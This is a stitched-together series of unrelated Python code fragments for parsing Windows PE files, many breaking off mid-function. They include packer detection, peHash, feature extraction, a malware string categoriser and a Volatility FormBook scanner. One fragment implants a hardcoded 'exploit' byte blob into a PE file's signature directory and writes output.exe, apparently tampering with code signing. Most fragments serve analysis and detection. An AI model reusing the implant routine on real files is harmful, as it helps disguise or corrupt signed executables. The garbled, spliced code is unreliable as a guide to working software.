self.txt_img_dos_header.insert('end', "{}\n\n".format(field))
else:
self.txt_img_dos_header.insert('end', "[*] [-]\n")
self.txt_img_dos_header.insert('end', "{}\n".format(field))
p += 1
self.txt_img_dos_header.config(state='disabled')
self.e_img_dos_header_info.config(state='normal')
self.e_img_dos_header_info.delete(0, 'end')
self.e_img_dos_header_info.insert(0, str(compteur))
self.e_img_dos_header_info.config(state='disabled')
def Sections(data, options):
counter = 1
pe = pefile.PE(data=data)
DumpFunction = GetDumpFunction(options)
#http://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/
dSections = {
#The packer/protector/tools section names/keywords
'.aspack': 'Aspack packer',
'.adata': 'Aspack packer/Armadillo packer',
'ASPack': 'Aspack packer',
'.ASPack': 'ASPAck Protector',
'.boom':
'The Boomerang List Builder (config+exe xored with a single byte key 0x77)',
'.ccg': 'CCG Packer (Chinese Packer)',
'.charmve': 'Added by the PIN tool',
'BitArts': 'Crunch 2.0 Packer',
'DAStub': 'DAStub Dragon Armor protector',
'!EPack': 'Epack packer',
'FSG!': 'FSG packer (not a section name, but a good identifier)',
'.gentee': 'Gentee installer',
'kkrunchy': 'kkrunchy Packer',
'.mackt': 'ImpRec-created section',
'.MaskPE': 'MaskPE Packer',
'MEW': 'MEW packer',
'.MPRESS1': 'Mpress Packer',
'.MPRESS2': 'Mpress Packer',
'.neolite': 'Neolite Packer',
'.neolit': 'Neolite Packer',
'.nsp1': 'NsPack packer',
'.nsp0': 'NsPack packer',
'.nsp2': 'NsPack packer',
'nsp1': 'NsPack packer',
'nsp0': 'NsPack packer',
'nsp2': 'NsPack packer',
'.packed': 'RLPack Packer (first section)',
'pebundle': 'PEBundle Packer',
'PEBundle': 'PEBundle Packer',
'PEC2TO': 'PECompact packer',
'PECompact2':
'PECompact packer (not a section name, but a good identifier)',
'PEC2': 'PECompact packer',
'pec1': 'PECompact packer',
'pec2': 'PECompact packer',
'PEC2MO': 'PECompact packer',
'PELOCKnt': 'PELock Protector',
'.perplex': 'Perplex PE-Protector',
'PESHiELD': 'PEShield Packer',
'.petite': 'Petite Packer',
'.pinclie': 'Added by the PIN tool',
'ProCrypt': 'ProCrypt Packer',
'.RLPack': 'RLPack Packer (second section)',
'.rmnet': 'Ramnit virus marker',
'RCryptor': 'RPCrypt Packer',
'.RPCrypt': 'RPCrypt Packer',
'.seau': 'SeauSFX Packer',
'.sforce3': 'StarForce Protection',
'.spack': 'Simple Pack (by bagie)',
'.svkp': 'SVKP packer',
'Themida': 'Themida Packer',
'.Themida': 'Themida Packer',
'.taz': 'Some version os PESpin',
'.tsuarch': 'TSULoader',
'.tsustub': 'TSULoader',
'.packed': 'Unknown Packer',
'PEPACK!!': 'Pepack',
'.Upack': 'Upack packer',
'.ByDwing': 'Upack Packer',
'UPX0': 'UPX packer',
'UPX1': 'UPX packer',
'UPX2': 'UPX packer',
'UPX!': 'UPX packer',
'.UPX0': 'UPX Packer',
'.UPX1': 'UPX Packer',
'.UPX2': 'UPX Packer',
'.vmp0': 'VMProtect packer',
'.vmp1': 'VMProtect packer',
'.vmp2': 'VMProtect packer',
'VProtect': 'Vprotect Packer',
'.winapi': 'Added by API Override tool',
'WinLicen': 'WinLicense (Themida) Protector',
'_winzip_': 'WinZip Self-Extractor',
'.WWPACK': 'WWPACK Packer',
'.yP': 'Y0da Protector',
'.y0da': 'Y0da Protector',
#List of popular section names
'.00cfg':
'Control Flow Guard (CFG) section (added by newer versions of Visual Studio)',
'.arch': 'Alpha-architecture section',
'.autoload_text':
'cygwin/gcc; the Cygwin DLL uses a section to avoid copying certain data on fork.',
'.bindat':
'Binary data (also used by one of the downware installers based on LUA)',
'.bootdat':
'section that can be found inside Visual Studio files; contains palette entries',
'.bss': 'Uninitialized Data Section',
'.BSS': 'Uninitialized Data Section',
'.buildid':
'gcc/cygwin; Contains debug information (if overlaps with debug directory)',
'.CLR_UEF':
'.CLR Unhandled Exception Handler section; see https://github.com/dotnet/coreclr/blob/master/src/vm/excep.h',
'.code': 'Code Section',
'.cormeta': '.CLR Metadata Section',
'.complua':
'Binary data, most likely compiled LUA (also used by one of the downware installers based on LUA)',
'.CRT': 'Initialized Data Section (C RunTime)',
'.cygwin_dll_common':
"cygwin section containing flags representing Cygwin's capabilities; refer to cygwin.sc and wincap.cc inside Cygwin run-time",
'.data': 'Data Section',
'.DATA': 'Data Section',
'.data1': 'Data Section',
'.data2': 'Data Section',
'.data3': 'Data Section',
'.debug': 'Debug info Section',
'.debug$F': 'Debug info Section (Visual C++ version <7.0)',
'.debug$P': 'Debug info Section (Visual C++ debug information',
'.debug$S': 'Debug info Section (Visual C++ debug information',
'.debug$T': 'Debug info Section (Visual C++ debug information',
'.drectve ':
'directive section (temporary, linker removes it after processing it; should not appear in a final PE image)',
'.didat': 'Delay Import Section',
'.didata': 'Delay Import Section',
'.edata': 'Export Data Section',
'.eh_fram': 'gcc/cygwin; Exception Handler Frame section',
'.export': 'Alternative Export Data Section',
'.fasm': 'FASM flat Section',
'.flat': 'FASM flat Section',
'.gfids': 'section added by new Visual Studio (14.0); purpose unknown',
'.giats': 'section added by new Visual Studio (14.0); purpose unknown',
'.gljmp': 'section added by new Visual Studio (14.0); purpose unknown',
'.glue_7t': 'ARMv7 core glue functions (thumb mode)',
'.glue_7': 'ARMv7 core glue functions (32-bit ARM mode)',
'.idata': 'Initialized Data Section (Borland)',
'.idlsym': 'IDL Attributes (registered SEH)',
'.impdata': 'Alternative Import data section',
'.itext': 'Code Section (Borland)',
'.ndata': 'Nullsoft Installer section',
'.orpc': 'Code section inside rpcrt4.dll',
'.pdata': 'Exception Handling Functions Section (PDATA records)',
'.rdata': 'Read-only initialized Data Section (MS and Borland)',
'.reloc': 'Relocations Section',
'.rodata': 'Read-only Data Section',
'.rsrc': 'Resource section',
'.sbss': 'GP-relative Uninitialized Data Section',
'.script': 'Section containing script',
'.shared': 'Shared section',
'.sdata': 'GP-relative Initialized Data Section',
'.srdata': 'GP-relative Read-only Data Section',
'.stab': 'Created by Haskell compiler (GHC)',
'.stabstr': 'Created by Haskell compiler (GHC)',
'.sxdata': 'Registered Exception Handlers Section',
'.text': 'Code Section',
'.text0': 'Alternative Code Section',
'.text1': 'Alternative Code Section',
'.text2': 'Alternative Code Section',
'.text3': 'Alternative Code Section',
'.textbss': 'Section used by incremental linking',
'.tls': 'Thread Local Storage Section',
'.tls$': 'Thread Local Storage Section',
'.udata': 'Uninitialized Data Section',
'.vsdata': 'GP-relative Initialized Data',
'.xdata': 'Exception Information Section',
'.wixburn':
'Wix section; see https://github.com/wixtoolset/wix3/blob/develop/src/burn/stub/StubSection.cpp',
'BSS': 'Uninitialized Data Section (Borland)',
'CODE': 'Code Section (Borland)',
'DATA': 'Data Section (Borland)',
'DGROUP': 'Legacy data group section',
'edata': 'Export Data Section',
'idata': 'Initialized Data Section (C RunTime)',
'INIT': 'INIT section (drivers)',
'minATL':
'Section that can be found inside some ARM PE files; purpose unknown',
'PAGE': 'PAGE section (drivers)',
'rdata': 'Read-only Data Section',
'sdata': 'Initialized Data Section',
'shared': 'Shared section',
'Shared': 'Shared section',
'testdata':
'section containing test data (can be found inside Visual Studio files)',
'text': 'Alternative Code Section',
}
if options.yara != None:
if not 'yara' in sys.modules:
print('Error: option yara requires the YARA Python module.')
return
rules, rulesVerbose = YARACompile(options.yara)
if options.verbose:
print(rulesVerbose)
for section in pe.sections:
sectionname = SectionNameToString(section.Name)
if options.getdata == '':
print('%d: %-10s %8d %f %s' %
(counter, sectionname, section.SizeOfRawData,
section.get_entropy(), dSections.get(sectionname, '')))
if options.yara != None:
for result in rules.match(data=section.get_data()):
print(' YARA rule: %s' % result.rule)
if options.yarastrings:
for stringdata in result.strings:
print(' %06x %s:' %
(stringdata[0], stringdata[1]))
print(' %s' %
binascii.hexlify(C2BIP3(stringdata[2])))
print(' %s' % repr(stringdata[2]))
elif int(options.getdata) == counter:
StdoutWriteChunked(DumpFunction(section.get_data()))
counter += 1
def calculate_pehash(file_path=None):
if not HAVE_PEFILE:
self.log('error',
"Missing dependency2, install pefile (`pip install pefile`)")
return ''
if not HAVE_BITSTRING:
self.log(
'error',
"Missing dependency2, install bitstring (`pip install bitstring`)")
return ''
if not file_path:
return ''
try:
exe = pefile.PE(file_path)
#image characteristics
img_chars = bitstring.BitArray(hex(exe.FILE_HEADER.Characteristics))
#pad to 16 bits
img_chars = bitstring.BitArray(bytes=img_chars.tobytes())
if img_chars.len == 16:
img_chars_xor = img_chars[0:7] ^ img_chars[8:15]
else:
img_chars_xor = img_chars[0:7]
#start to build pehash
pehash_bin = bitstring.BitArray(img_chars_xor)
#subsystem -
sub_chars = bitstring.BitArray(hex(exe.FILE_HEADER.Machine))
#pad to 16 bits
sub_chars = bitstring.BitArray(bytes=sub_chars.tobytes())
sub_chars_xor = sub_chars[0:7] ^ sub_chars[8:15]
pehash_bin.append(sub_chars_xor)
#Stack Commit Size
stk_size = bitstring.BitArray(
hex(exe.OPTIONAL_HEADER.SizeOfStackCommit))
stk_size_bits = string.zfill(stk_size.bin, 32)
#now xor the bits
stk_size = bitstring.BitArray(bin=stk_size_bits)
stk_size_xor = stk_size[8:15] ^ stk_size[16:23] ^ stk_size[24:31]
#pad to 8 bits
stk_size_xor = bitstring.BitArray(bytes=stk_size_xor.tobytes())
pehash_bin.append(stk_size_xor)
#Heap Commit Size
hp_size = bitstring.BitArray(hex(exe.OPTIONAL_HEADER.SizeOfHeapCommit))
hp_size_bits = string.zfill(hp_size.bin, 32)
#now xor the bits
hp_size = bitstring.BitArray(bin=hp_size_bits)
hp_size_xor = hp_size[8:15] ^ hp_size[16:23] ^ hp_size[24:31]
#pad to 8 bits
hp_size_xor = bitstring.BitArray(bytes=hp_size_xor.tobytes())
pehash_bin.append(hp_size_xor)
#Section chars
for section in exe.sections:
#virutal address
sect_va = bitstring.BitArray(hex(section.VirtualAddress))
sect_va = bitstring.BitArray(bytes=sect_va.tobytes())
pehash_bin.append(sect_va)
#rawsize
sect_rs = bitstring.BitArray(hex(section.SizeOfRawData))
sect_rs = bitstring.BitArray(bytes=sect_rs.tobytes())
sect_rs_bits = string.zfill(sect_rs.bin, 32)
sect_rs = bitstring.BitArray(bin=sect_rs_bits)
sect_rs = bitstring.BitArray(bytes=sect_rs.tobytes())
sect_rs_bits = sect_rs[8:31]
pehash_bin.append(sect_rs_bits)
#section chars
sect_chars = bitstring.BitArray(hex(section.Characteristics))
sect_chars = bitstring.BitArray(bytes=sect_chars.tobytes())
sect_chars_xor = sect_chars[16:23] ^ sect_chars[24:31]
pehash_bin.append(sect_chars_xor)
#entropy calulation
address = section.VirtualAddress
size = section.SizeOfRawData
raw = exe.write()[address + size:]
if size == 0:
kolmog = bitstring.BitArray(float=1, length=32)
pehash_bin.append(kolmog[0:7])
continue
bz2_raw = bz2.compress(raw)
bz2_size = len(bz2_raw)
#k = round(bz2_size / size, 5)
k = bz2_size / size
kolmog = bitstring.BitArray(float=k, length=32)
pehash_bin.append(kolmog[0:7])
m = hashlib.sha1()
m.update(pehash_bin.tobytes())
return str(m.hexdigest())
except:
return ''
def e_features(
filename
): #Extract the features from the given filename. Uses pefile to do the file parsing, only a subset of features are chosen from the parsed file
features = {}
try:
pe = pefile.PE(filename, fast_load=False)
# Basic Info
features['Filename'] = os.path.basename(filename)
features['Size'] = os.path.getsize(filename) # in bytes
# Dos Header ?
# File Header
features['Machine'] = pe.FILE_HEADER.Machine
features['NumberOfSections'] = pe.FILE_HEADER.NumberOfSections
features['TimeDateStamp'] = pe.FILE_HEADER.TimeDateStamp
features['PointerToSymbolTable'] = pe.FILE_HEADER.PointerToSymbolTable
features['NumberOfSymbols'] = pe.FILE_HEADER.NumberOfSymbols
features['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
features[
'Characteristics'] = pe.FILE_HEADER.Characteristics # May be used to calculate flags
# Flags ?
# Optional Header
features['Magic'] = pe.OPTIONAL_HEADER.Magic
features['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
features['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
features['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
features[
'SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
features[
'SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
features[
'AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
features['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
#if hasattr(pe.OPTIONAL_HEADER, 'BaseOfData'): # not sure about this one
# features['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
features['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
features['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
features['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
features[
'MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
features[
'MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
features['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
features['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
features[
'MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
features[
'MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
features['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
features['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
features['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
features['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
features['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
features['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
features['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
features['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
features['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
features['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
features[
'NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
# DLL Characteristics ?
# PE Sections
for section in pe.sections:
if (section.Name == b'.text\x00\x00\x00'):
features['.textSize'] = section.SizeOfRawData
features['.textEntropy'] = section.get_entropy()
features['.textCharacteristics'] = section.Characteristics
elif (section.Name == b'.data\x00\x00\x00'):
features['.dataSize'] = section.SizeOfRawData
features['.dataEntropy'] = section.get_entropy()
features['.dataCharacteristics'] = section.Characteristics
elif (section.Name == b'UPX0\x00\x00\x00\x00'):
features['.textSize'] = section.SizeOfRawData
features['.textEntropy'] = section.get_entropy()
features['.textCharacteristics'] = section.Characteristics
elif (section.Name == b'UPX1\x00\x00\x00\x00'):
features['.dataSize'] = section.SizeOfRawData
features['.dataEntropy'] = section.get_entropy()
features['.dataCharacteristics'] = section.Characteristics
else:
continue
# Flags ?
except Exception as e:
print("Error processing %s - %s" % (filename, str(e)))
# print traceback.format_exc()
return None
# print(features)
return features
import collections
import pefile
import fileinput
import sys
import binascii
pe_path = sys.argv[1]
pe = pefile.PE(pe_path)
image_base = pe.OPTIONAL_HEADER.ImageBase
def fhex(byte):
return hex(byte)[2:].zfill(2) + " "
def build_patch(section):
print("_chamAdd(0x" +
hex(image_base + section.VirtualAddress)[2:].upper() + ',"' +
"".join(map(fhex,
section.get_data()
[:section.Misc_VirtualSize]))[:-1].upper() + '")')
print('local function _chamAdd(addr, code) \
local cham_exe = ffi.cast("char*",addr) \
local i = 0 \
for v in string.gmatch(code, "([^ ]+)") do \
cham_exe[i] = tonumber(v, 16) \
i = i+1 \
end \
def post_processing(vm_disk, maps_fp, partition=2):
"""Performs post-processing on a trace session.
Specifically, it mounts the VM disk, extracts all the binaries that were loaded during
execution, expands them into their in-memory layouts, and saves them to the extract directory.
Keyword Arguments:
vm_disk -- Filepath to the QCOW2 VM disk.
maps_fp -- Filepath to maps file.
partition -- Partition number to mount. 2 by default, which is the norm for Windows 7.
Returns:
0 upon success, otherwise a non-zero error code.
"""
if not os.path.isfile(vm_disk):
log.error(vm_disk + " is not a file")
return 2
if not os.path.isfile(maps_fp):
log.error(maps_fp + " is not a file")
return 4
log.debug("Mounting " + vm_disk)
nbd_path = lookup_bin('qemu-nbd')
temp_dir = tempfile.mkdtemp()
ret = subprocess.call([
'sudo', nbd_path, '--connect=/dev/nbd0', vm_disk, '-P',
str(partition)
])
if ret != 0:
log.error('qemu-nbd returned code: ' + str(ret))
return 1
ret = subprocess.call(['sudo', 'mount', '-o', 'ro', '/dev/nbd0', temp_dir])
if ret != 0:
log.error('mount returned code: ' + str(ret))
return 3
log.debug("Parsing " + maps_fp)
with open(maps_fp) as ifile:
# Note: we intentionally remove the leading / to make a relative path
bins = [
line[70:].replace('\\', '/').strip() for line in ifile.readlines()
if len(line) >= 69 and line[69] == "\\"
]
log.debug("Expanding " + str(len(bins)) + " binaries")
for bin in bins:
binpath = os.path.join(temp_dir, bin)
opath = 'extract/' + os.path.basename(binpath)
if not os.path.isfile(binpath):
log.debug("Cannot find " + binpath)
continue
if os.path.isfile(opath):
log.debug("Already expanded " + opath + ", skipping")
continue
pe = pefile.PE(binpath)
data = pe.get_memory_mapped_image()
with open(opath, 'wb') as ofile:
ofile.write(data)
pe.close()
log.debug("Unmounting " + vm_disk)
ret = 1
while ret != 0:
sleep(2) # Give time for I/O to complete
ret = subprocess.call(['sudo', 'umount', temp_dir],
stdout=DEVNULL,
stderr=DEVNULL)
subprocess.call(['sudo', nbd_path, '--disconnect', '/dev/nbd0'],
stdout=DEVNULL,
stderr=DEVNULL)
subprocess.call(['rm', '-rf', temp_dir])
return 0
def OnCreate(self, form):
try:
self.parent = self.FormToPyQtWidget(form)
except:
self.parent = self.FormToPySideWidget(form)
try:
self.pe = pefile.PE(GetInputFilePath().decode("utf-8"))
except:
self.pe = pefile.PE(GetInputFilePath())
self.EntryPoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.ImageBase = self.pe.OPTIONAL_HEADER.ImageBase
self.section_list = {}
self.img = []
self.img_label = []
self.LineEdit_list = []
self.PushButton_list = []
self.label1 = QLabel("Start Offset : ")
self.label2 = QLabel("Length : ")
self.label3 = QLabel("Variable name : ")
self.label4 = QLabel("Icon Size")
icon1 = QLabel("Icon")
icon1.setAlignment(Qt.AlignCenter)
icon2 = QLabel("Icon Size")
icon2.setAlignment(Qt.AlignCenter)
icon3 = QLabel("Rule")
icon3.setAlignment(Qt.AlignCenter)
icon4 = QLabel("Save Rule")
icon4.setAlignment(Qt.AlignCenter)
self.LineEdit1 = QLineEdit()
self.LineEdit2 = QLineEdit()
self.LineEdit3 = QLineEdit()
self.PushButton1 = QPushButton("Enter")
self.PushButton1.clicked.connect(self.YaraMaker)
for section in self.pe.sections:
self.section_list[section.Name.decode("utf-8").replace(
"\x00", "")] = [
hex(section.VirtualAddress),
hex(section.SizeOfRawData),
hex(section.PointerToRawData)
]
for entry in self.pe.DIRECTORY_ENTRY_RESOURCE.entries:
resource_type = entry.name
if resource_type is None:
resource_type = pefile.RESOURCE_TYPE.get(entry.struct.Id)
for directory in entry.directory.entries:
for resource in directory.directory.entries:
name = str(resource_type)
if name in "RT_ICON":
name = str(resource_type)
offset = resource.data.struct.OffsetToData
size = resource.data.struct.Size
RVA_ = int(self.section_list['.rsrc'][0], 16) - int(
self.section_list['.rsrc'][2],
16) # VirtualAddress - PointerToRawData
real_offset = offset - RVA_
img_size = hex(size)[2:]
if len(img_size) % 2 == 1:
img_size = "0" + img_size
img_ = "\x00\x00\x01\x00\x01\x00\x30\x30\x00\x00\x01\x00\x08\x00" + bytearray.fromhex(
img_size)[::-1] + "\x00\x00\x16\x00\x00\x00"
try:
f = open(GetInputFilePath().decode("utf-8"), "rb")
except:
f = open(GetInputFilePath(), "rb")
f.seek(real_offset)
img_ += f.read(size)
f.close()
self.img.append(img_)
# print(hex(offset), real_offset)
self.layout = QVBoxLayout()
GL0 = QGridLayout()
GL0.addWidget(self.label3, 0, 0)
GL0.addWidget(self.LineEdit3, 0, 1)
GL0.addWidget(self.label1, 0, 2)
GL0.addWidget(self.LineEdit1, 0, 3)
GL0.addWidget(self.label2, 0, 4)
GL0.addWidget(self.LineEdit2, 0, 5)
GL0.addWidget(self.PushButton1, 0, 6)
self.layout.addLayout(GL0)
GL1 = QGridLayout()
GL1.addWidget(icon1, 0, 0)
GL1.addWidget(icon2, 0, 1)
GL1.addWidget(icon3, 0, 2)
GL1.addWidget(icon4, 0, 3)
for idx, i in enumerate(self.img):
## https://stackoverflow.com/questions/35655755/qpixmap-argument-1-has-unexpected-type-pngimagefile?rq=1
## https://stackoverflow.com/questions/32908639/open-pil-image-from-byte-file
image2 = Image.open(io.BytesIO(i))
qimage = ImageQt(image2)
pixmap = QPixmap.fromImage(qimage)
self.img_label.append(QLabel())
self.img_label[idx].setPixmap(pixmap)
GL1.addWidget(self.img_label[idx], idx + 1, 0)
GL1.addWidget(QLabel(hex(len(i))), idx + 1, 1)
self.LineEdit_list.append(QLineEdit())
GL1.addWidget(self.LineEdit_list[idx], idx + 1, 2)
self.PushButton_list.append(QPushButton("Enter"))
self.PushButton_list[idx].clicked.connect(
partial(self.SaveIcon, idx))
GL1.addWidget(self.PushButton_list[idx], idx + 1, 3)
self.layout.addLayout(GL1)
self.parent.setLayout(self.layout)
return ent
directory = os.fsdecode("C:\\Users\\wills\\Desktop\\exegroup")
outFile = open("C:\\Users\\wills\\Desktop\\OutFile-Not-Malware3.txt", "w")
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith('.exe'):
print(filename)
file_path = r"C:\Users\wills\Desktop\exegroup\{}".format(filename)
print(file_path)
fd = open(file_path, "rb")
pe_data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)
pe = pefile.PE(data=pe_data)
# getting PE section names for the file
section_names = []
for section in pe.sections:
section_name = force_decode(section.Name)
section_names.append(section_name)
# getting the entropy of the file
entropy = calculate_entropy(file_path)
# PE header info
machine = pe.FILE_HEADER.Machine
time_date_stamp = pe.FILE_HEADER.dump_dict(
)["TimeDateStamp"]["Value"].split("[")[1][:-1]
number_of_sections = pe.FILE_HEADER.NumberOfSections
времени и создания таблицы Debug Directory.
Пример использования:
python get_debug_compilations_time.py d:/file.exe
"""
import sys
import time
import pefile
try:
file_path = sys.argv[1]
except IndexError:
print('Не указан файл.')
sys.exit(0)
try:
pe = pefile.PE(file_path)
except FileNotFoundError:
print('Не удается найти указанный файл:', sys.argv[1])
sys.exit(0)
except pefile.PEFormatError:
print('Файл', sys.argv[1], 'не является PE файлом Windows.')
sys.exit(0)
time_stamp = 0
if hasattr(pe, 'DIRECTORY_ENTRY_DEBUG'):
time_stamp = pe.DIRECTORY_ENTRY_DEBUG[0].struct.TimeDateStamp
if time_stamp != 0:
print('Дата и время компиляции:', time.strftime('%d-%m-%Y %H:%M:%S', time.gmtime(time_stamp)))
else:
print('Метка времени создания Debug Directory отсутствует')
f = open(filename, 'rb')
content = bytearray(f.read())
f.close()
if (sig_offset == 0):
print("[!] Nothing found... Trying to implant anyway")
i = 0
exploit = b"\x80\x08\x00\x00\x00\x00\x02\x000\x82\x08s\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x08d0\x82\x08`\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x86\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x0b\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x01b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\x0b\x22"
while i != len(content) - 123:
if content[i:i + 123] == b"\x00" * 123:
print(f"[*] Found space at {hex(i)}")
break
i += 1
pe = pefile.PE(filename, fast_load=True)
for s in pe.__structures__:
if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
s.VirtualAddress = i
s.Size = 0x880
pe.set_bytes_at_offset(i, exploit)
pe.write(filename="output.exe")
else:
print("[*] OID found !: " + hex(content[sig_offset + 0x7a]))
content[sig_offset + 0x7a] += 1
f = open("output.exe", 'wb')
f.write(content)
f.close()
hex(section.Characteristics) + '\n')
print("*" * 50)
def table(pe):
# for data_dir in pe.OPTIONAL_HEADER.DATA_DIRECTORY:
# print(data_dir)
# reading section directory
print("sectio directories: ")
for section in pe.sections:
print(section.Name.decode('utf-8'))
print("\tVirtual Address: " + hex(section.VirtualAddress))
print("\tVirtual Size: " + hex(section.Misc_VirtualSize))
print("\tRaw Size: " + hex(section.SizeOfRawData))
# reading the export directory
print("the export directories: ")
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
print(hex(pe.OPTIONAL_HEADER.ImageBase + exp.address),
exp.name.decode('utf-8'))
if "__main__" == __name__:
pe = pefile.PE("test.dll")
dos_header(pe)
pe_header(pe)
file_header(pe)
optional_header(pe)
section_header(pe)
table(pe)
def Analyzer():
# Creating tables
allFuncs = 0
tables = PrettyTable()
dllTable = PrettyTable()
resTable = PrettyTable()
statistics = PrettyTable()
# Gathering information about sections
pe = pf.PE(fileName)
print(f"{infoS} Informations about Sections")
print("-" * 40)
for sect in pe.sections:
print(sect.Name.decode().rstrip('\x00') + "\n|\n|---- Virtual Size: " +
hex(sect.Misc_VirtualSize) + "\n|\n|---- Virtual Address: " +
hex(sect.VirtualAddress) + "\n|\n|---- Size of Raw Data: " +
hex(sect.SizeOfRawData) + "\n|\n|---- Pointer to Raw Data: " +
hex(sect.PointerToRawData) + "\n|\n|---- Characteristics: " +
hex(sect.Characteristics) + "\n")
print("-" * 40)
# categorizing extracted strings
for key in regdict:
for el in regdict[key]:
if el in allStrings:
if el != "":
dictCateg[key].append(el)
allFuncs += 1
# printing categorized strings
for key in dictCateg:
if dictCateg[key] != []:
# More important categories
if key == "Keyboard/Keylogging" or key == "Evasion/Bypassing" or key == "System/Persistence" or key == "Cryptography" or key == "Information Gathering":
print(
f"\n{yellow}[{red}!{yellow}]__WARNING__[{red}!{yellow}]{white}"
)
# Printing zone
tables.field_names = [
f"Functions or Strings about {green}{key}{white}"
]
for i in dictCateg[key]:
if i == "":
pass
else:
tables.add_row([f"{red}{i}{white}"])
# Logging for summary table
if key == "Registry":
scoreDict[key] += 1
elif key == "File":
scoreDict[key] += 1
elif key == "Networking/Web":
scoreDict[key] += 1
elif key == "Keyboard/Keylogging":
scoreDict[key] += 1
elif key == "Process":
scoreDict[key] += 1
elif key == "Memory Management":
scoreDict[key] += 1
elif key == "Dll/Resource Handling":
scoreDict[key] += 1
elif key == "Evasion/Bypassing":
scoreDict[key] += 1
elif key == "System/Persistence":
scoreDict[key] += 1
elif key == "COMObject":
scoreDict[key] += 1
elif key == "Cryptography":
scoreDict[key] += 1
elif key == "Information Gathering":
scoreDict[key] += 1
elif key == "Other/Unknown":
scoreDict[key] += 1
else:
pass
print(tables)
tables.clear_rows()
# gathering extracted dll files
try:
dllTable.field_names = [f"Linked {green}DLL{white} Files"]
for items in pe.DIRECTORY_ENTRY_IMPORT:
dlStr = str(items.dll.decode())
dllTable.add_row([f"{red}{dlStr}{white}"])
print(dllTable)
except:
pass
# Resource scanner zone
resCounter = 0
resTable.field_names = [
f"Extracted File Extensions", "Names", "Byte Matches", "Confidence"
]
resourceList = list(pr.magic_file(fileName))
for res in range(0, len(resourceList)):
extrExt = str(resourceList[res].extension)
extrNam = str(resourceList[res].name)
extrByt = str(resourceList[res].byte_match)
if resourceList[res].confidence >= 0.4:
resCounter += 1
if extrExt == '':
resTable.add_row([
f"{red}No Extension{white}", f"{red}{extrNam}{white}",
f"{red}{extrByt}{white}",
f"{red}{resourceList[res].confidence}{white}"
])
else:
resTable.add_row([
f"{red}{extrExt}{white}", f"{red}{extrNam}{white}",
f"{red}{extrByt}{white}",
f"{red}{resourceList[res].confidence}{white}"
])
if len(resourceList) != 0:
print(resTable)
# Statistics zone
print(f"\n{green}->{white} Statistics for: {green}{fileName}{white}")
# printing all function statistics
statistics.field_names = ["Categories", "Number of Functions or Strings"]
statistics.add_row(
[f"{green}All Functions{white}", f"{green}{allFuncs}{white}"])
for key in scoreDict:
if scoreDict[key] == 0:
pass
else:
if key == "Keyboard/Keylogging" or key == "Evasion/Bypassing" or key == "System/Persistence" or key == "Cryptography" or key == "Information Gathering":
statistics.add_row(
[f"{yellow}{key}{white}", f"{red}{scoreDict[key]}{white}"])
else:
statistics.add_row(
[f"{white}{key}", f"{scoreDict[key]}{white}"])
print(statistics)
# Warning about obfuscated file
if allFuncs < 20:
print(
f"\n{errorS} This file might be obfuscated or encrypted. Try {green}--packer{white} to scan this file for packers."
)
print(
f"{errorS} You can also use {green}--hashscan{white} to scan this file.\n"
)
sys.exit(0)
def calculate(self):
if not has_yara:
debug.error("Yara must be installed for this plugin")
addr_space = utils.load_as(self._config)
os, memory_model = self.is_valid_profile(addr_space.profile)
if not os:
debug.error("This command does not support the selected profile.")
rules = yara.compile(sources=formbook_sig)
for task in self.filter_tasks(tasks.pslist(addr_space)):
scanner = malfind.VadYaraScanner(task=task, rules=rules)
for hit, address in scanner.scan():
vad_base_addr, end = self.get_vad_base(task, address)
proc_addr_space = task.get_process_address_space()
data = proc_addr_space.zread(vad_base_addr,
end - vad_base_addr)
config_data = []
try:
pe = pefile.PE(data=data)
except:
continue
for pattern in CONFIG_PATTERNS:
offset = re.search(pattern, data).start()
offset += 6
key1_offset = unpack("=I",
data[offset:offset + 4])[0] + offset + 11
